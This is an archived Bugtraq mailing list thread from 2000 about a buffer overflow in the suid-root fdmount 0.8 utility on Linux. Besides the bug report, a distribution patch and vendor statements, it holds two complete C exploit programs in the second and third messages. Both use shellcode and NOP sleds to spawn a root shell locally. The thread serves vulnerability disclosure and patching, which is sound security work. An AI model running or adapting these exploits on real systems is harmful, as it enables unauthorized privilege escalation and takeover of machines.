5120073 2000-05-22 21:35 /48 rader/ Postmaster
Mottagare: Bugtraq (import) <10942>
Ärende: fdmount buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Message-ID: <20000522115143.10352.qmail@securityfocus.com>
Date: Mon, 22 May 2000 11:51:43 -0000
Reply-To: Arend-Jan Wijtzes <aj@AJ.NU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Arend-Jan Wijtzes <aj@AJ.NU>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
I searched the archives and did not find this one.
Program : fdmount
Version : 0.8
OS : linux Slackware 7.0 (maybe others)
This program is normally only executable by members of group
'floppy' and installed suid-root by default.
Bug Details:
void msg(char *text,...) {
char buff[80];
va_list p;
va_start(p,text);
vsprintf(buff,text,p);
va_end(p);
printf("%s (%s): %s\n",progname,curdev,buff);
}
It can, for example, be overflowed with a large enough
non-existing mountpoint parameter:
fdmount fd0
/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla//bla/bla/bla/bla/bla/bla/bla/bla/bla/bla/
Segmentation fault
It seems a simple excersise to exploit this.
The whole program's code is bad news for security, and it
would not surprise me if there are more flaws to be found
here. From the man page fdmount (1), section 'bugs':
* Probably not very secure yet (when running suid
root). Untested with ext and xia filesystems.
Using strncpy and vsnprintf would fix things.
Ofcourse, you must be in group 'floppy' to exploit this.
aj
(5120073) ------------------------------------------
5123808 2000-05-23 19:34 /158 rader/ Postmaster
Mottagare: Bugtraq (import) <10951>
Ärende: Re: fdmount buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-version: 1.0
Content-type: multipart/mixed
boundary="----=_NextPart_000_000F_01BFC47D.45AD3AC0"
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
X-Priority: 3
Message-ID: <001201bfc46c$82fe9e20$edb31ec4@terotech>
Date: Tue, 23 May 2000 06:08:10 +0200
Reply-To: Cami <camis@QTTECH.CO.ZA>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Cami <camis@QTTECH.CO.ZA>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_000F_01BFC47D.45AD3AC0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
| I searched the archives and did not find this one.
|
| Program : fdmount
| Version : 0.8
| OS : linux Slackware 7.0 (maybe others)
Check attachment for the overflow, works on Slackware 4.0 and 7.0.
The exploit code attached was coded by Scrippie of buffer0verfl0w security.
(it was posted/released on www.hack.co.za on the 18th may, so its no
longer private/unknown.)
++C
------=_NextPart_000_000F_01BFC47D.45AD3AC0
Content-Type: application/octet-stream;
name="fdmnt-smash2.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="fdmnt-smash2.c"
/*
Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent =
it
is to correct my code and send me a flame.
The fdutils package contains a setuid root file that is used by
the = floppy
group to mount and unmount floppies. If you are not in this group, =
this
exploit will not work.
This thingy was tested on Slackware 4.0 and 7.0
Use as: fdmount-exp [offset] [buf size] [valid text ptr]
Since the char * text is overwritten in void errmsg(char *text) we =
should
make sure that this points to a valid address (something in the .data
section should do perfectly). The hard coded one used works on my =
box,
to find the one you need use something like:
objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1
The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...
Take care with your newly aquired EUID 0!
Cheers go out to: #phreak.nl #b0f #hit2000 #root66
The year 2000 scriptkiddie award goed to: Gerrie Mansur
Love goes out to: Hester, Maja (you're so cute!), Dopey
-- Yours truly,
Scrippie - ronald@grafix.nl - buffer0verfl0w security
- #phreak.nl
*/
#include <stdio.h>
#define NUM_NOPS 500
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =3D
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
int buf_size =3D 71;
int offset=3D0, i;
char *overflow;
char *ovoff;
long addr, ptr=3D0x0804c7d0;
if(argc>1) offset =3D atoi(argv[1]);
if(argc>2) buf_size =3D atoi(argv[2]);
if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char
*text\n", = ptr);
if(!(overflow =3D (char =
*)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] =3D '/';
for(i=3D1;i<buf_size;i++) {
overflow[i] =3D 0x90;
}
addr =3D get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff =3D overflow + strlen(overflow);
for(i=3D0;i<NUM_NOPS;i++) {
*ovoff =3D 0x90;
*ovoff++;
}
strcpy(ovoff, shellcode);
execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
return 0;
}
/* www.hack.co.za [18 May]*/
------=_NextPart_000_000F_01BFC47D.45AD3AC0--
(5123808) ------------------------------------------(Ombruten)
5123894 2000-05-23 20:24 /84 rader/ Postmaster
Mottagare: Bugtraq (import) <10955>
Ärende: fdmount 0.8 exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3929CCD6.2A210A2B@nitnet.com.br>
Date: Mon, 22 May 2000 21:12:06 -0300
Reply-To: Paulo Ribeiro <prrar@NITNET.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Paulo Ribeiro <prrar@NITNET.COM.BR>
X-To: BUGTRAQ@SECURITYFOCUS.COM
X-cc: INCIDENTS@SECURITYFOCUS.COM, VULN-DEV@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
/*
* fdmount 0.8 buffer-overflow exploit (fd-ex.c)
* (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
*
* Systems tested: Slackware Linux 7.0
*
* Remember: you have to be a member of floppy group to exploit it!
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 180
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/bin/fdmount fd0 $RET");
}
/* fd-ex.c: EOF */
(5123894) ------------------------------------------
5127719 2000-05-24 18:53 /52 rader/ Postmaster
Mottagare: Bugtraq (import) <10962>
Ärende: Re: fdmount buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <m3em6tqkhf.fsf@test1.mandrakesoft.com>
Date: Tue, 23 May 2000 18:50:20 +0200
Reply-To: Vandoorselaere Yoann <yoann@MANDRAKESOFT.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Vandoorselaere Yoann <yoann@MANDRAKESOFT.COM>
X-To: Chmouel Boudjnah <chmouel@mandrakesoft.com>
X-cc: Greg Olszewski <noop@NWONKNU.ORG>
BUGTRAQ@SECURITYFOCUS.COM, future@linux-mandrake.com To:
BUGTRAQ@SECURITYFOCUS.COM In-Reply-To: Chmouel Boudjnah's message of
"23 May 2000 19:40:55 +0200"
Chmouel Boudjnah <chmouel@mandrakesoft.com> writes:
> Greg Olszewski <noop@NWONKNU.ORG> writes:
>
> > Debian 2.1, 2.2, 2.3: fdmount is NOT installed suid.
> > Mandrake 7.0: Vulnerable
>
> All our security system is handle via msec, in this case we add a user
> in the floppy group only if we are in level >= 3.
>
> So we are not affected if by default you did an Server install or set
> your security level to 4 5.
>
> Indeed we are affected if (and only if) the user is in the floppy
> group. A fix (remove suid root) come soon.
Here is a patch to correct the fdmount problem...
--- fdmount.c.orig Tue May 23 18:48:40 2000
+++ fdmount.c Tue May 23 18:49:04 2000
@@ -127,9 +127,10 @@
void errmsg(char *text,...) {
char buff[80];
+
va_list p;
va_start(p,text);
- vsprintf(buff,text,p);
+ vsnprintf(buff, 80, text,p);
va_end(p);
if(use_syslog)
syslog(LOG_ERR, "%s: %s\n",curdev,buff);
--
-- Yoann, http://www.mandrakesoft.com/~yoann/
It is well known that M$ products don't call free() after a malloc().
The Unix community wish them good luck for their future
developments.
(5127719) ------------------------------------------(Ombruten)
5129656 2000-05-25 10:36 /26 rader/ Postmaster
Mottagare: Bugtraq (import) <10990>
Ärende: Re: fdmount buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000524165847.A28058@devserv.devel.redhat.com>
Date: Wed, 24 May 2000 16:58:47 -0400
Reply-To: Matt Wilson <msw@REDHAT.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Matt Wilson <msw@REDHAT.COM>
X-To: Arend-Jan Wijtzes <aj@AJ.NU>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000522115143.10352.qmail@securityfocus.com>; from aj@AJ.NU o
Mon, May 22, 2000 at 11:51:43AM -0000
On Mon, May 22, 2000 at 11:51:43AM -0000, Arend-Jan Wijtzes wrote:
> I searched the archives and did not find this one.
>
> Program : fdmount
> Version : 0.8
> OS : linux Slackware 7.0 (maybe others)
Red Hat Linux does not ship fdmount.
Matt
(5129656) ------------------------------------------